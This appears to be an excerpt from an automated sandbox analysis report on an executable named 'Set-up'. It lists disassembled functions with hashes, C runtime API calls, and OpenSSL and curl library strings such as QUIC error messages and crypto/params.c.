                          • Instruction ID: 5f51a7c304ad7dd10b1fa739dfcb0c36b4b88e43430a45cfc42332583a297f65
                          • Opcode Fuzzy Hash: 108912cfa50bdc4513b18b08d9829f616ed0d0ceee59db08c85cab1dc316db50
                          • Instruction Fuzzy Hash: AAA1F871A24302EBD7149E1589907ABB7E6AFF0704F15842CF88897281E770DCBDD792
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00050090
                            • Part of subcall function 0010F340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,000500B0,?,?,00000000,00000000,?), ref: 0010F35D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _time64strlen
                          • String ID: $$Bad file size (%lld)$File already completely downloaded$Offset (%lld) was beyond file size (%lld)
                          • API String ID: 3014104814-979756411
                          • Opcode ID: 17f2d7ffc05b22de5b21f7ed85a4aee7f5e4b7896c9e5904a5f1dbafa6dffd50
                          • Instruction ID: f50456e7cf00c74f1e70069d898441d5738a2c237bf6c99b2c2a32c59d4db80c
                          • Opcode Fuzzy Hash: 17f2d7ffc05b22de5b21f7ed85a4aee7f5e4b7896c9e5904a5f1dbafa6dffd50
                          • Instruction Fuzzy Hash: 1EB10671B043009FD755DF28C880AABBBE5AFC9314F14462DFD98973A2D770AD488B62
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: No URL set$User-Agent: %s$cannot mix POSTFIELDS with RESUME_FROM$transfer.c
                          • API String ID: 0-950935550
                          • Opcode ID: b050ff643fac76abb1fa5c7479a56aafb09efbfba6ffa3f18954129265353091
                          • Instruction ID: 9757ef4293229fbf08825df9d4ee58f1a683d9db6148447215cf4f9adf87abbc
                          • Opcode Fuzzy Hash: b050ff643fac76abb1fa5c7479a56aafb09efbfba6ffa3f18954129265353091
                          • Instruction Fuzzy Hash: 63B1F4B1B00E42ABE76A9B74DC46BE6F798BF55315F040339E42C92282E7717524CBD2
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0017A37F
                          Strings
                          • ossl_quic_channel_raise_protocol_error_loc, xrefs: 0017A2D9, 0017A3B0
                          • QUIC error code: 0x%llx%s%s%s, reason: "%s", xrefs: 0017A3D5
                          • ssl/quic/quic_channel.c, xrefs: 0017A2E3, 0017A3BA
                          • QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s", xrefs: 0017A310
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl/quic/quic_channel.c
                          • API String ID: 39653677-1084217658
                          • Opcode ID: a9d3e20453abefdee486c59c839666449cbca1a12ce48df76340db48da753b3f
                          • Instruction ID: bd9c8b69440b9f6ccf5bf4642567237d788c1b6c37de2b0e2703a09a55c1c400
                          • Opcode Fuzzy Hash: a9d3e20453abefdee486c59c839666449cbca1a12ce48df76340db48da753b3f
                          • Instruction Fuzzy Hash: F45191B1A04349ABCF00DF64DC42A9B7BE5FF98354F444529FE4C97241E735D9148BA2
                          APIs
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,000F0E3B,?,?,00000000,?), ref: 003A63E9
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,000F0E3B,?,?,00000000,?), ref: 003A63FB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _errno
                          • String ID:
                          • API String ID: 2918714741-0
                          • Opcode ID: 4a4fab48c011511840bcebb10c291fdb8d758a0aa1e7550c0d2da400f0d7635a
                          • Instruction ID: 7238eb9b4c21fea5d8cb29b4afa2040b6beb68b0e806fd72f0ee7b0f935eee40
                          • Opcode Fuzzy Hash: 4a4fab48c011511840bcebb10c291fdb8d758a0aa1e7550c0d2da400f0d7635a
                          • Instruction Fuzzy Hash: B841F675A043019FDB059F699882B2F77E8EF96314F1E483CF84AC72A2E634DC058792
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001D691C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: err:%lx:%lx:%lx:%lx$error:%08lX:%s:%s:%s$lib(%lu)$reason(%lu)
                          • API String ID: 39653677-804487489
                          • Opcode ID: 9cc7537d2cf9eb7b39fb02e91c6e1bb26aee2ae7469a23b4690e157d1fa500c2
                          • Instruction ID: cbc272c75d21798e67132c22b53c22a7b9d368e6beb0e9a0b64331c50e8e25db
                          • Opcode Fuzzy Hash: 9cc7537d2cf9eb7b39fb02e91c6e1bb26aee2ae7469a23b4690e157d1fa500c2
                          • Instruction Fuzzy Hash: 673108B2A40304BBF7216A559C46BAB76DD9BA5318F040039FE4C923D3F771AD24D6A2
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,0036ABB9), ref: 0036A34E
                            • Part of subcall function 001FE270: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 001FE28D
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,0036ABB9), ref: 0036A446
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$_errno
                          • String ID: .cnf$.conf$crypto/conf/conf_def.c
                          • API String ID: 3066963124-3060939390
                          • Opcode ID: 1c10656cc71c6b31afbf131e2ab7ce25823a2bef7ba3109c542095d0761d361e
                          • Instruction ID: f818ecd8fd15f7ddc665d81f01df7420e1bb880fe28caef3d6d8489fe5a2b06a
                          • Opcode Fuzzy Hash: 1c10656cc71c6b31afbf131e2ab7ce25823a2bef7ba3109c542095d0761d361e
                          • Instruction Fuzzy Hash: CC2139E5D0460577DB127731AC43E2B36DC8F62344F058838F909A6396FB65DD1485A3
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000,00000000,00000000,00000100,?,001FF556,00000000,FFFFFFFF,00000000,?,00000000,002006DF,?), ref: 001B08D7
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,00000000,0017973B), ref: 001B0977
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memsetstrcpystrlen
                          • String ID: BUF_MEM_grow$crypto/buffer/buffer.c
                          • API String ID: 1298912638-2735992530
                          • Opcode ID: eb9702d07c5bc023b68b360a993b7fd797329973c8b7f5f11807702bb02b1208
                          • Instruction ID: 48fdfb96b6ab30fc04744c78501c341abedd551673134200ff50c2c07914f787
                          • Opcode Fuzzy Hash: eb9702d07c5bc023b68b360a993b7fd797329973c8b7f5f11807702bb02b1208
                          • Instruction Fuzzy Hash: 81316CB1E403117BE325AA209C02F6BB39DEB5875CF058124F91D973C3E361AD1087D1
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,00202704,00000008), ref: 0020204D
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00202704,00000008), ref: 002020C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strcpystrlen$memcpymemset
                          • String ID: copy_integer$crypto/params.c$general_set_int
                          • API String ID: 2323844366-2562949257
                          • Opcode ID: 72a99a4fc14c5d7ba73f52f348030ce5c8ac66c3f0778ae0f57824b2d48fe287
                          • Instruction ID: 7e2d25602715d373b118e7c6efcf709278a7dd132fa4a6733ad3152079e33aba
                          • Opcode Fuzzy Hash: 72a99a4fc14c5d7ba73f52f348030ce5c8ac66c3f0778ae0f57824b2d48fe287
                          • Instruction Fuzzy Hash: AE212D70A18301EBD3306A24AC8AF777796DBA5704F14017BF908973C3E6A2AC69C261
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,0020299E,00000008), ref: 002021A8
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,0020299E,00000008), ref: 002021FE
                            • Part of subcall function 002040A0: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00202075,?,?,?,?,?,?,00202704,00000008), ref: 002040C1
                            • Part of subcall function 002040A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00202075,?,?,?,?,?,?,00202704,00000008), ref: 0020411E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: copy_integer$crypto/params.c$general_get_uint
                          • API String ID: 1297977491-1187682564
                          • Opcode ID: 3c34c6cc576911d580320b12898563b996456be0f5fe97f925ada2f7e0bf1ee9
                          • Instruction ID: 7e1e2a9b82a237d9679eb08153540f43d35edf19cee222c68485a3e3ecddb367
                          • Opcode Fuzzy Hash: 3c34c6cc576911d580320b12898563b996456be0f5fe97f925ada2f7e0bf1ee9
                          • Instruction Fuzzy Hash: 8C2138B6B54301B6D7203664BC47F6FA307CBD5B25F590127FB0C6B2C3FAA158A941A0
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,?,00202BF4,00000008), ref: 002022C1
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,00202BF4,00000008), ref: 00202312
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: copy_integer$crypto/params.c$general_set_uint
                          • API String ID: 1297977491-3191580373
                          • Opcode ID: e2c545f1046276a8e597383efe785c740d8233c1cd1c6ab45bbdc53cd3ea0cfa
                          • Instruction ID: dfc9bc97d32aa3207798154224d26dfde232d57c96f0d4f259be9fa725859cb6
                          • Opcode Fuzzy Hash: e2c545f1046276a8e597383efe785c740d8233c1cd1c6ab45bbdc53cd3ea0cfa
                          • Instruction Fuzzy Hash: 98216170B28341EFDB346AA4AC8AF3A7349DBD5704F14016FFC05972C3EAA59C584261
                          APIs
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,?,?,?,00202075,?,?,?,?,?,?,00202704,00000008), ref: 002040C1
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7262
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D7285
                            • Part of subcall function 001D7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72C5
                            • Part of subcall function 001D7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001D72E8
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00202075,?,?,?,?,?,?,00202704,00000008), ref: 0020411E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strcpystrlen$memcpymemset
                          • String ID: copy_integer$crypto/params.c$unsigned_from_signed
                          • API String ID: 2323844366-3781254518
                          • Opcode ID: f63d7486fb65e14543cc7d6438b724dc43493abc48f1d2901c90de8041bd027b
